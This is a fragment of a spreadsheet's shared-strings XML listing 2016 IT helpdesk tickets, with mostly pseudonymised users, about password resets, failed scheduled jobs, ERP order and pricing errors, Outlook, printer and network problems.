booking of orders &amp; resolving customer's queries are getting delayed due to this.  await your immediate feedback.
à²•à³ƒà²¤à²œà³à²žà²¤à³†à²—à²³à³  / with </t>
  </si>
  <si>
    <t>fgdsvija qvixmubh</t>
  </si>
  <si>
    <t>business_client - authorisation</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: vomtbcej.lyiwqrct@gmail.com
hello;
pl. provide business_client authorization for checking/downloading drawings.
employee id: 20295658
</t>
  </si>
  <si>
    <t>vomtbcej lyiwqrct</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_562 failed in job_scheduler at: 10/13/2016 22:21:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_562 failed in job_scheduler at: 10/13/2016 22:21:00</t>
  </si>
  <si>
    <t xml:space="preserve">job bkwin_HostName_770_inc failed in job_scheduler at: 10/13/2016 21:46:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkwin_HostName_770_inc failed in job_scheduler at: 10/13/2016 21:46:00</t>
  </si>
  <si>
    <t>error _ sto from plant_44 to plant_55</t>
  </si>
  <si>
    <t xml:space="preserve">when creating sto to return complained goods from plant_44 to plant_55, we found the error message as below, please help fixing this issue and advise back to us aerp. </t>
  </si>
  <si>
    <t>so#36131539 / condition type</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: qgvbalix.smehqkyj@gmail.com_x000D_
_x000D_
hello it team,_x000D_
_x000D_
we are not able to change the condition type for pos. 20, 50 and 60 in so#36131539._x000D_
please check and advise me._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>qgvbalix smehqkyj</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_43filesys failed in job_scheduler at: 10/13/2016 20:38:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_43filesys failed in job_scheduler at: 10/13/2016 20:38:00</t>
  </si>
  <si>
    <t>ticket update on inplant_869308</t>
  </si>
  <si>
    <t xml:space="preserve">show me the text that is written on the email that has been quarantined below? </t>
  </si>
  <si>
    <t xml:space="preserve">show me the text that is written on the email that has been quarantined below? _x000D_
_x000D_
from: uisewznr ewtmkphs _x000D_
sent: friday, october 14, 2016 3:04 am_x000D_
to: nwfodmhc exurcwkm_x000D_
subject: fw: notification: fwd: needed material drawing_x000D_
_x000D_
hi team,_x000D_
_x000D_
can you please show me the text that is written on the email that has been quarantined below? </t>
  </si>
  <si>
    <t>uisewznr ewtmkphs</t>
  </si>
  <si>
    <t>unable to submit expense report</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vxzahrlc.frtkpehy@gmail.com_x000D_
_x000D_
could someone please call me. i have tried to call it and it keeps disconnecting._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>unable to install engineering_tool</t>
  </si>
  <si>
    <t>eagvusbr nguqityl</t>
  </si>
  <si>
    <t>order shipped ups ground</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
from: tjlgzkbp iervwjzg _x000D_
sent: thursday, october 13, 2016 10:37 pm_x000D_
to: nwfodmhc exurcwkm_x000D_
subject: ran fw: freight charge for cesco inwarehouse_tool 0159299348_x000D_
_x000D_
ref: sales doc 36128707_x000D_
_x000D_
order shipped ups groundâ€¦.1 poundâ€¦.shipping verified freight cost in kis is $17.78._x000D_
inwarehouse_tool 0159299348 shows $34.68â€¦this is incorrect._x000D_
please advise why the system applied the much higher, incorrect freight charge to their inwarehouse_tool._x000D_
</t>
  </si>
  <si>
    <t>tjlgzkbp iervwjzg</t>
  </si>
  <si>
    <t>ticket update on ticket_no0449295</t>
  </si>
  <si>
    <t>ticket update on ticket_no0449268</t>
  </si>
  <si>
    <t>ticket update on inplant_869259</t>
  </si>
  <si>
    <t>reset passwords for bnoupaki cpeioxdz using password_management_tool password reset.</t>
  </si>
  <si>
    <t>bnoupaki cpeioxdz</t>
  </si>
  <si>
    <t>impact awards email</t>
  </si>
  <si>
    <t>from: nwqktzlx vnlqkgpb 
sent: thursday, october 13, 2016 11:01 pm
to: nwfodmhc exurcwkm
subject:  (phishing check?) fw: e</t>
  </si>
  <si>
    <t>nwqktzlx vnlqkgpb</t>
  </si>
  <si>
    <t>expense report not going to correct manager</t>
  </si>
  <si>
    <t>lkecfram tweaokch</t>
  </si>
  <si>
    <t>unable to sync passwords on all accounts</t>
  </si>
  <si>
    <t>dabkvsqt grtwfdxb</t>
  </si>
  <si>
    <t>rhpqxsuy vcukgdfe</t>
  </si>
  <si>
    <t>cannot get prtqx7318 to print on pc rqxw8517736, drivers won't load.</t>
  </si>
  <si>
    <t>kpm issue / ie upgrade from 10 to ie11</t>
  </si>
  <si>
    <t>amssm003:volume: c:\ disk is over 88% space consumed.</t>
  </si>
  <si>
    <t>amssm003:volume: c:\ disk is over 88% space consumed. space available: 2.2 g</t>
  </si>
  <si>
    <t>blank call //gso // loud noise</t>
  </si>
  <si>
    <t xml:space="preserve">erp password reset  for user  kambthryes2 ( exlbkpoj vrkoqaje ) </t>
  </si>
  <si>
    <t>please reset erp - password of kambthryes2 ( exlbkpoj vrkoqaje ) to â€ždaypay3"</t>
  </si>
  <si>
    <t>mrwucjho tjeaxnhu</t>
  </si>
  <si>
    <t>reset SID_39 password for jidhewlg jufskody</t>
  </si>
  <si>
    <t xml:space="preserve">could you please reset the password for the user olthyivectr for SID_39 in erp? he is company sales manager and his password is not working and he needs this access due the channel partner programdnty.
</t>
  </si>
  <si>
    <t>gifpuwtb aykegsvr</t>
  </si>
  <si>
    <t>ticket update on inplant_869231</t>
  </si>
  <si>
    <t>need verification of proper user id</t>
  </si>
  <si>
    <t xml:space="preserve">xszoedmc gmhkdsnw,. approvals in purchasing are not working properly.  please verify that the proper samaccountname in ad is in lowercase for rxqtvanc kthqwxvb (tegdtyyp) and ethd yhtheehey (shyheehew2). </t>
  </si>
  <si>
    <t>pbfscenq qvaylkne</t>
  </si>
  <si>
    <t>lean tracker</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: sdbcpvtx.hzpctsla@gmail.com
mithyke tayjuoylor and arithel shfsako get this error when they try to open the 'add a lean event' button on their pcs.
[cid:image001.png@01d2255d.a4b446f0]
</t>
  </si>
  <si>
    <t>sdbcpvtx hzpctsla</t>
  </si>
  <si>
    <t>msd - office 2013  specifically outlook</t>
  </si>
  <si>
    <t xml:space="preserve">outlook is very slow to respond, i'm having to manually refresh to update._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>home folder share delegation of dtheb mulhylen (mullthyed) to lpoebzsc grknswyo (marthhty)</t>
  </si>
  <si>
    <t>vip 1 // please usa user access to dtheb mulhylen's o:\ drive - full access
name : lpoebzsc grknswyo
email : lpoebzsc.grknswyo@gmail.com
telephone : 
summary : as you may know, dtheb mulhylen will be retiring from company on october 28th.  please usa me access to her o:\ drive - full access</t>
  </si>
  <si>
    <t>res: ticket_no1558759 -- register - ie rj  tax code- in erp SID_34</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: lokiwfhg.udkoqrcg@gmail.com_x000D_
_x000D_
hi all,_x000D_
i already approved this by email, but i don't hear nothing about._x000D_
could you please verify the status? its urgency in south_amerirtca._x000D_
</t>
  </si>
  <si>
    <t>lokiwfhg udkoqrcg</t>
  </si>
  <si>
    <t>cannot download or print drawings from erp netweaver.</t>
  </si>
  <si>
    <t xml:space="preserve">
summary:hello! i cannot download or print drawings from erp netweaver.</t>
  </si>
  <si>
    <t>deqmzotr zhrjngbi</t>
  </si>
  <si>
    <t>outlook not updating ; crashing intermittently</t>
  </si>
  <si>
    <t>wipzvlug urmdkgpa</t>
  </si>
  <si>
    <t>HostName_175: dev/SID_36data4a the space has been used to 98 %.</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_175: dev/SID_36data4a the space has been used to 98 %._x000D_
HostName_175: dev/SID_36data3a the space has been used to 98 %._x000D_
</t>
  </si>
  <si>
    <t>ticket update on ticket_no0449233</t>
  </si>
  <si>
    <t xml:space="preserve">from: sbgvrncj idfhtoqv 
sent: thursday, october 13, 2016 9:02 pm
to: przcxbml vnjdghui; nwfodmhc exurcwkm
cc: jywvemun qngschtz
subject:  re: synchronization iphone with outlook
hi thsgy,
yes this option is available.
gso,
please open a ticket for this and i approve.
many </t>
  </si>
  <si>
    <t>przcxbml vnjdghui</t>
  </si>
  <si>
    <t>need access to  assistant programdnty in nx</t>
  </si>
  <si>
    <t>ajdcnwtb bvijwxko</t>
  </si>
  <si>
    <t>unable to login to collaboration_platform with email address and password</t>
  </si>
  <si>
    <t>aeykqxlr brpdswvu</t>
  </si>
  <si>
    <t>email delegation</t>
  </si>
  <si>
    <t>i would like to have todthyd renytrner email forwarded to myself. todthyd has accepted the vsp and i will be assuming his duties.</t>
  </si>
  <si>
    <t>gvdkupew waphsuen</t>
  </si>
  <si>
    <t>hpqc - initialization error</t>
  </si>
  <si>
    <t xml:space="preserve">trying to access hpqc _x000D_
_x000D_
error:_x000D_
initialization has failed.  contract your system administrator.  for details, see the loader log file._x000D_
failure details:_x000D_
</t>
  </si>
  <si>
    <t>erckhtzj tdmkgoie</t>
  </si>
  <si>
    <t>static issue on phone..interaction id : 1064826347</t>
  </si>
  <si>
    <t>unable to access ap remote or eu remote while na remote is down fjaqbgnld yukdzwxs</t>
  </si>
  <si>
    <t>when i try to access either one i receive the message that "this page can't be displayed."</t>
  </si>
  <si>
    <t>engineering_tool  not opening</t>
  </si>
  <si>
    <t>ibsywxpc icxhsbfv</t>
  </si>
  <si>
    <t>email activation on company provided device</t>
  </si>
  <si>
    <t>rqfmcjak gcxvtbrz</t>
  </si>
  <si>
    <t>not able to login</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: uypsqcbm.fqpybgri@gmail.com_x000D_
_x000D_
hi sir/ma'am_x000D_
_x000D_
refer below screenshot and help me out. urgent!_x000D_
_x000D_
[cid:image001.jpg@01d2258d.0SID_29acb0]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>office asking for license key</t>
  </si>
  <si>
    <t>cjsukemx lqkcesuf</t>
  </si>
  <si>
    <t>erp inbox, ich bin nicht im workcenter nr. 51111937 = pe_emea_fu3 = aerospace gruppe eingetragen</t>
  </si>
  <si>
    <t xml:space="preserve">workflow meiner gruppe fÃ¼r mich nicht sichtbar , nicht im workcenter nr. 51111937 = pe_emea_fu3 = aerospace gruppe eingetragen
</t>
  </si>
  <si>
    <t>xsnrlygw nmqyraec</t>
  </si>
  <si>
    <t xml:space="preserve">engineering_tool company and company not working </t>
  </si>
  <si>
    <t>shkwgxln ikpvtjgn</t>
  </si>
  <si>
    <t>unable to save docs on t drive. internet not working</t>
  </si>
  <si>
    <t>rjwbntef nmuikjgo</t>
  </si>
  <si>
    <t>unable to open excel file from collaboration_platform</t>
  </si>
  <si>
    <t xml:space="preserve">name:wqxzleky uwjchqor
language:
browser:microsoft internet explorer
email:wqxzleky.uwjchqor@gmail.com
customer number:
telephone:
summary:cannot open files in collaboration_platform, get message that server isn't responding.  location of files:  </t>
  </si>
  <si>
    <t>circuit outage : company-na-usa-usa-anira-rtr01 is down since 10/13 at 9:58 am est site is up on backup circuit</t>
  </si>
  <si>
    <t>what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    _________     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ___10/13 at 9:58 am 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_yes_______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</si>
  <si>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
received from: lokiwfhg.udkoqrcg@gmail.com
hi ramdntyassthywamy,
any status on this?
</t>
  </si>
  <si>
    <t xml:space="preserve">msd crm popup when try to lunch outlook and outlook freezing </t>
  </si>
  <si>
    <t>unable to edit in collaboration_platform</t>
  </si>
  <si>
    <t xml:space="preserve">name : budighfl izbxvary
browser : microsoft internet explorer
email : budighfl.izbxvary@gmail.com
telephone : 
summary : i cannot edit
</t>
  </si>
  <si>
    <t xml:space="preserve">ms crm emails not coming to outlook </t>
  </si>
  <si>
    <t>ghfvmpqi fehkscza</t>
  </si>
  <si>
    <t>unable to login to ethics</t>
  </si>
  <si>
    <t>ekracmdp yphqstfj</t>
  </si>
  <si>
    <t>ticket update for-inplant_866222</t>
  </si>
  <si>
    <t>secure logon does not work</t>
  </si>
  <si>
    <t xml:space="preserve">when try and initialize secure logon get message username or password incorrect. logged on earlier this morning and it worked fine. phone </t>
  </si>
  <si>
    <t>otagsuzp xazhusry</t>
  </si>
  <si>
    <t xml:space="preserve">account locked out : windows </t>
  </si>
  <si>
    <t>ndrtahvm kjhdybzm</t>
  </si>
  <si>
    <t>account locked</t>
  </si>
  <si>
    <t>vgzmjkop rgeubdco</t>
  </si>
  <si>
    <t>ticket query regarding : ticket_no0447258</t>
  </si>
  <si>
    <t>naehwsgr guwlzejm</t>
  </si>
  <si>
    <t>unable to login to skype</t>
  </si>
  <si>
    <t>zjuciaxv przcfied</t>
  </si>
  <si>
    <t>the new iphone 6s is not getting quaraintined.</t>
  </si>
  <si>
    <t>jkraueqn gthlexzo</t>
  </si>
  <si>
    <t>having issues with outlook</t>
  </si>
  <si>
    <t>otpkzifh gywinoml</t>
  </si>
  <si>
    <t>i need accsess to this link.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rcmziuob.xhblozqe@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i need accses to this report._x000D_
_x000D_
\\HostName_702\departments\pubreports\fy17&lt;file://HostName_702/departments/pubreports/fy17&gt;_x000D_
[cid:image001.png@01d22559.75e00b60]_x000D_
vielen dank_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>rcmziuob xhblozqe</t>
  </si>
  <si>
    <t>vip 2: outlook freezing.</t>
  </si>
  <si>
    <t>ihozauxs ohdqmipz</t>
  </si>
  <si>
    <t xml:space="preserve">account lockout </t>
  </si>
  <si>
    <t>please update change for user "giuliasana byhdderni" from "company.com to company.com"</t>
  </si>
  <si>
    <t>change for user "giuliasana byhdderni" from "company.com to company.com"</t>
  </si>
  <si>
    <t>vpityxbu qktwepmz</t>
  </si>
  <si>
    <t>telephony_software phone</t>
  </si>
  <si>
    <t>benelthyux team has bad phone connection of incomming calls. a lot of crackling and interruption.</t>
  </si>
  <si>
    <t>xdtiwshm ijyrtulh</t>
  </si>
  <si>
    <t>probleme mit lan am rechner \ we_wu113 \ essa \wrcktgbd wzrgyunp</t>
  </si>
  <si>
    <t>pdf dateien gehen nicht auf</t>
  </si>
  <si>
    <t>fiwaltqr utykjmwi</t>
  </si>
  <si>
    <t>unable to re print inwarehouse_tool</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
received from: rxoynvgi.ntgdsehl@gmail.com_x000D_
_x000D_
hi it team_x000D_
_x000D_
kindly please assist as we unable to reprint inwarehouse_tool in ecs system._x000D_
_x000D_
the system just show below attached only without any other detail._x000D_
_x000D_
[cid:image002.png@01d22583.967eedd0]_x000D_
_x000D_
[cid:image001.png@01d22583.4d17baf0]_x000D_
_x000D_
_x000D_
hydstheud mddwwyleh_x000D_
operation supervisor_x000D_
company distribution services of asia pte ltd_x000D_
( asia regional distribution centre)_x000D_
5 changi south lane_x000D_
# 04-01,  c &amp; p building_x000D_
apac 486045_x000D_
t :  +65 6379 4571_x000D_
f : +65 6546 5504_x000D_
m : +65 9459 1605_x000D_
email : rxoynvgi.ntgdsehl@gmail.com&lt;mailto:rxoynvgi.ntgdsehl@gmail.com&gt;</t>
  </si>
  <si>
    <t>cannot find workgroups in telephony_software</t>
  </si>
  <si>
    <t>i cannot find 2/de/fd/gso/de/v as well as  2/de/fd/gso/de/c in telephony_software. i had access until atleast last week and possibly on monday too.</t>
  </si>
  <si>
    <t>wireless mouse is missing from desk</t>
  </si>
  <si>
    <t>wireless mouse is missing from desk, need new replaced wireless mouse.</t>
  </si>
  <si>
    <t>msd -unable to sync all the contact information from outlook to crm</t>
  </si>
  <si>
    <t xml:space="preserve">unable to sync all the contact information from outlook to crm. the address and notes  fields are not synced to crm as there are more then 4500 contacts its not possible to put the company name for each customer manually
contact number- </t>
  </si>
  <si>
    <t>probleme mit portal \ user : gogtyekthyto \vzqomdgt jwoqbuml</t>
  </si>
  <si>
    <t>re: inc1547248- logging into mii supervisor dashbankrd results in error pop-up.. 'internal server error'</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: wsabzycm.pbhrmnyz@gmail.com_x000D_
_x000D_
hi stefyty,_x000D_
_x000D_
recent we have moved some changes to improve the performance._x000D_
can you please check if you are still getting the same issue._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>wsabzycm pbhrmnyz</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_593 failed in job_scheduler at: 10/13/2016 04:58:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_593 failed in job_scheduler at: 10/13/2016 04:58:00</t>
  </si>
  <si>
    <t xml:space="preserve">automatical stock transfers shows wrong (tool late) delivery date; route the ticket forward to supply_chain team please </t>
  </si>
  <si>
    <t xml:space="preserve">hello,_x000D_
_x000D_
we have again the problem with wrong (too late) automaticaly created stock stransfers. the delivery date is too late._x000D_
#4195579 need at plant_223 on 15 nov., 5019339763/00001 shows delivery date 17 nov._x000D_
the parts are available at plant_105._x000D_
why dosen't show the stock transfer the wrong delivery date?_x000D_
_x000D_
we had the same problem with #4457992 - 5019250478_x000D_
the issue needs to solved a.s.a.p._x000D_
</t>
  </si>
  <si>
    <t>yfmaqovp wdonhbez</t>
  </si>
  <si>
    <t>ethics training course</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: aunkpchr.qsyvrmjl@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
every quarter when the course has been added, it does not appear in my current learning._x000D_
i'll have to find out the course name from my team mates and check in the "browse" option._x000D_
could you please help to resolve this issue permanently.._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>drucker em93 macht willkÃ¼rlich flecken auf den ausdrucken/kopien !!!</t>
  </si>
  <si>
    <t>ltxzfcgm sxvigclz</t>
  </si>
  <si>
    <t>company-eu-deu-germany-e-b2-f2-new-office-3550-access-sw01 power supply issue.</t>
  </si>
  <si>
    <t xml:space="preserve">internal power supply - on   company-eu-deu-germany-e-b2-f2-new-office-3550-access-sw01 (68.20.26.7986) is showing faulty_x000D_
_x000D_
_x000D_
company-eu-deu-germany-e-b2-f2-new-&gt;sh env all_x000D_
fan is ok_x000D_
temperature is ok_x000D_
power is faulty_x000D_
rps is not present _x000D_
</t>
  </si>
  <si>
    <t>computer check</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: qhyoiwls.uynrhiva@gmail.com
hi,
please check my computer â€“ excel runs slowly !
[cid:image001.png@01d22538.3ed1aa50]
[cid:image002.png@01d22539.ccb60450]
[cid:image003.png@01d2253a.835b8630]
qhyoiwls uynrhiva
analyst planning &amp; reporting
qhyoiwls.uynrhiva@gmail.com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</si>
  <si>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qhyoiwls uynrhiva</t>
  </si>
  <si>
    <t>reset the password for xaykwtrf amlswjfr on erp / produktion / erp</t>
  </si>
  <si>
    <t>xaykwtrf amlswjfr</t>
  </si>
  <si>
    <t>probleme mit lan \youfzmgp xvysrnmb</t>
  </si>
  <si>
    <t>youfzmgp xvysrnmb</t>
  </si>
  <si>
    <t>no vpn connection my employee p. financial.</t>
  </si>
  <si>
    <t xml:space="preserve">name:jvxtfhkg heptuizn
language:
browser:microsoft internet explorer
email:jvxtfhkg.heptuizn@gmail.com
customer number:
telephone:
summary:no vpn connection my employee p. financial.
__________________
ic
 welcome, our next available agent will be with you shortly...
 interaction alerting agent.
 website visitor has joined the conversation
dwfiykeo argtxmvcumar3
 hello
 is it petrghada financial?
jvxtfhkg heptuizn
 no it's pethrywr financial
dwfiykeo argtxmvcumar3
 ok
jvxtfhkg heptuizn
 can you call him, it's urgent
dwfiykeo argtxmvcumar3
 ok will do it
jvxtfhkg heptuizn
 </t>
  </si>
  <si>
    <t>ç­”å¤: ticket_no1559458 : wireless guest access- hr_tool trainer</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: krnzfoct.mnjbuedp@gmail.com
hi ,
well received.
</t>
  </si>
  <si>
    <t>krnzfoct mnjbuedp</t>
  </si>
  <si>
    <t>wifi connection is intermittent (getting frequently disconnected) in india.</t>
  </si>
  <si>
    <t xml:space="preserve">wifi connection is intermittent (getting frequently disconnected) in india.
contact : 
intranet is getting affected.
</t>
  </si>
  <si>
    <t>ykcvjwax cfigbjuo</t>
  </si>
  <si>
    <t>[erp] reroute production order printer mp74 to mp82</t>
  </si>
  <si>
    <t>production order printer mp74 (10.16.77.212) needs to be routed to mp82 (10.16.77.222)_x000D_
_x000D_
-&gt; all erp systems including drawings etc._x000D_
_x000D_
unable to find printer mp82 (in ticketing_tool, ad and erp_print_tool)_x000D_
rerouted priter with name prqmp82 did not work.</t>
  </si>
  <si>
    <t>:network problem in india office</t>
  </si>
  <si>
    <t xml:space="preserve">telephone:
summary:network problem in india
_______________
ic
 welcome, our next available agent will be with you shortly...
 interaction alerting agent.
 website visitor has joined the conversation
dwfiykeo argtxmvcumar3
 hello, </t>
  </si>
  <si>
    <t>ruhvqcwz kdqzlijw</t>
  </si>
  <si>
    <t>reset passwords for usa feathers using password_management_tool password reset.</t>
  </si>
  <si>
    <t>lmqysdec ljvbnpqw</t>
  </si>
  <si>
    <t>missing punches</t>
  </si>
  <si>
    <t>hello, there are punches out missing in erp for the employees that ended night shift today in the morning. location: germany, germany  machining. please, help.</t>
  </si>
  <si>
    <t>GRP_52</t>
  </si>
  <si>
    <t>qwghibcf uptkgzbe</t>
  </si>
  <si>
    <t>upgrade pc ramdnty</t>
  </si>
  <si>
    <t>i raised a ticket to upgrade the system ramdnty.  can mine be upgrade to 8gb?
assign to sridthshar herytur.</t>
  </si>
  <si>
    <t>ticket_no1559458 : wireless guest access- hr_tool trainer</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: aorthyme.rnsuipbk@gmail.com
hi 
please find below the credentials of guest access for annyhtie zhothu.
[cid:image001.jpg@01d2254c.ce0f3110]
</t>
  </si>
  <si>
    <t>_x000D_
this link can not be open</t>
  </si>
  <si>
    <t>vroxskje bixtmefd</t>
  </si>
  <si>
    <t>grir issues plant_322 for ice alt. routes from usa</t>
  </si>
  <si>
    <t xml:space="preserve">email from maryhtutina bauuyternfeyt to athyndy eartyp to review alternate route shipments from 1204 from us warehouse and discrepancy in postings.
5018873735 00001: inwarehouse_tool has been cancelled, please cancel gr as well, no delivery note
5018080021 00001: inwarehouse_tool has been cancelled, please cancel gr as well, no delivery note
5019195890 00001: inwarehouse_tool has been cancelled, please cancel gr as well, no delivery note
</t>
  </si>
  <si>
    <t>GRP_53</t>
  </si>
  <si>
    <t>cbligfne wmoxktnj</t>
  </si>
  <si>
    <t>account blocked</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: kmzwjdsb.ejgnafcy@gmail.com_x000D_
_x000D_
hello,_x000D_
could you help me unlock my account._x000D_
i can not get through _x000D_
</t>
  </si>
  <si>
    <t>kmzwjdsb ejgnafcy</t>
  </si>
  <si>
    <t>datenÃ¼bertragung nicht mÃ¶glich!</t>
  </si>
  <si>
    <t>keine datenÃ¼bertragung von pc auf maschine mÃ¶glich!
werk: plant_107
workcenter: ebm052
maschine: 45162335 /03
pc: eemwx004016
programdntym: winprodnc
ansprechpartner: r. wunthyder</t>
  </si>
  <si>
    <t>ajiqfrkz dolmpkqf</t>
  </si>
  <si>
    <t>ess portal</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ygkzwsud.cvjgkxws@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i am unable to log in to bex website through ess portal. please help._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>current learning - ethics</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: bcxpeuko.utorqehx@gmail.com_x000D_
_x000D_
hi,_x000D_
oct is the month where we usually gets new ethics training course._x000D_
this time, i didn't receive any ethics mail and also my current learning is empty. but few of my colleagues got the mail to complete the course._x000D_
is it that this time, i don't  need to complete the course?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>bcxpeuko utorqehx</t>
  </si>
  <si>
    <t>ç”µè„‘æ— æ³•æ‰“å¼€ç½‘é¡µã€‚</t>
  </si>
  <si>
    <t xml:space="preserve">å¼ å·¥æ‚¨å¥½ï¼_x000D_
æˆ‘çš„ç”µè„‘è¿žæŽ¥å…¬å¸ç½‘ç»œæ— æ³•ä½¿ç”¨ï¼ˆä½†163ç­‰æ­£å¸¸ï¼‰ï¼Œä¿¡æ¯å¦‚ä¸‹ï¼šï¼ˆcrmæ— æ³•ç™»é™†ï¼Œvpnæ— æ³•è¿žæŽ¥ï¼Œethicsæ— æ³•è¿žæŽ¥ï¼Œä½†é‚®ä»¶å¯ä»¥æ­£å¸¸æŽ¥æ”¶ï¼‰_x000D_
å¦‚ä½•è§£å†³ï¼Ÿ_x000D_
 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>tmufgokq qtzavows</t>
  </si>
  <si>
    <t>production order cannot be released - 115991131</t>
  </si>
  <si>
    <t xml:space="preserve">hello it,_x000D_
_x000D_
production order cannot be released - 226002242 - "cer1 is active" "the business ta cannot be carried out". _x000D_
please see attached screenshot._x000D_
_x000D_
please solve aerp. shipment has to be done today._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>vujymcls sgpmyviq</t>
  </si>
  <si>
    <t>usa warehouse:long distance service down</t>
  </si>
  <si>
    <t xml:space="preserve">from:  mdghayi redytudy 
sent: wednesday, october 12, 2016 11:02 am
to: zarlgjes nxjvzcta; datacenter
cc: tiyhum kuyiomar
subject: re: long distance service down
hello dac,
there is an alarm on one of circuit id dhec027838 at usa. please can you open a ticket with global_telecom_1 and co-ordinate.
</t>
  </si>
  <si>
    <t>jvhqyamt wodzrcjg</t>
  </si>
  <si>
    <t>vhqgbpik fkvigjbu</t>
  </si>
  <si>
    <t>payment method change from "t" to "c" for all employee vendors in 5323 &amp; 5330</t>
  </si>
  <si>
    <t xml:space="preserve">
from: gnasmtvx cwxtsvkm 
sent: wednesday, october 12, 2016 12:51 pm
to: nathyresh gayhtjula
cc: rwuqydvo anecdfps; pradyhtueep yyufs
subject: re: apt run
hi nathyresh,
we request you to change the payment method as c instead of t for all the employee masters.
</t>
  </si>
  <si>
    <t>gnasmtvx cwxtsvkm</t>
  </si>
  <si>
    <t>anti-fmxcnwpu tcwrdqboinition is not updated from long time</t>
  </si>
  <si>
    <t>anti-fmxcnwpu tcwrdqboinition is not updated from long time. attached the screenshot.</t>
  </si>
  <si>
    <t>ldsjntax eqozfasc</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1329 failed in job_scheduler at: 10/13/2016 00:11:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1329 failed in job_scheduler at: 10/13/2016 00:11:00</t>
  </si>
  <si>
    <t>pricing condition issue in oa</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rayhtukumujar.br2@company.com_x000D_
_x000D_
hello,_x000D_
_x000D_
in the recent past, we are facing an issue of pricing condition not getting changed while booking the order._x000D_
_x000D_
though we override the pricing condition with znr, the pricing condition remains as zlp1 only._x000D_
_x000D_
for example, in oa 36131265, the price was over written with znr condition with a nett price of rs. 5726.54.  but still pricing condition is shown as zlp1 with standard discount._x000D_
_x000D_
what we have observed is whenever there are sub delivery items created due to non-availability of stock, this issue crops up.  that too, after the challan is created, it becomes too difficult to make any changes._x000D_
_x000D_
we request you to look into this immediately, assign sev2 ticket and resolve the same._x000D_
_x000D_
await your feedback._x000D_
_x000D_
à²•à³ƒà²¤à²œà³à²žà²¤à³†à²—à²³à³  / with </t>
  </si>
  <si>
    <t>need network connection for alicona edgemaster at pu5</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vtwxaefm.ljisafue@gmail.com_x000D_
_x000D_
it helpdesk,_x000D_
_x000D_
please provide network connection for alicona edgemaster hone measuring equipment installed in pu5._x000D_
_x000D_
this is necessary for software updating and also for shatryung relevant information with global team._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">the printer is defaulting to the usa printer for delivery notes.  need to take the default out so it defaults to  </t>
  </si>
  <si>
    <t xml:space="preserve">from: kryuisti turleythy 
sent: wednesday, october 12, 2016 11:30 pm
to: nwfodmhc exurcwkm
subject: rakthyesh fw: delivery note for bakyhrer huhuyghes
please see string of emails on an issue that is happening with the transfer of shipping materials that used to be shipped from usa to now being shipped from usa and usa.  the printer is defaulting to the usa printer for delivery notes.  need to take the default out so it defaults to the shipping plant.  please let me know if you need more information.    i do not know what is triggering it to print from usa printer.  having same issue in usa.  
kryuisti turleythy
usa site business manager
hybiaxlk.lawptzir@gmail.com
from: kryuisti turleythy 
sent: wednesday, october 12, 2016 10:39 am
to: ebpwcfla qoxvpbam &lt;zdgnlqkc.zfjbpntg@gmail.com&gt;
cc: gmnhjfbw farnwhji &lt;gmnhjfbw.farnwhji@gmail.com&gt;
subject: re: delivery note for bakyhrer huhuyghes
so, the issue is that for some reason it is defaulting to a usa printer for the delivery note.   what is your printer number and i will send it to the printer?  for future orders, before you save the delivery, go to extraïƒ delivery outputïƒ  header and change the printer in communication method. 
kryuisti turleythy
usa site business manager
hybiaxlk.lawptzir@gmail.com
from: ebpwcfla qoxvpbam 
sent: wednesday, october 12, 2016 9:07 am
to: kryuisti turleythy &lt;hybiaxlk.lawptzir@gmail.com&gt;
subject: re: delivery note for bakyhrer huhuyghes
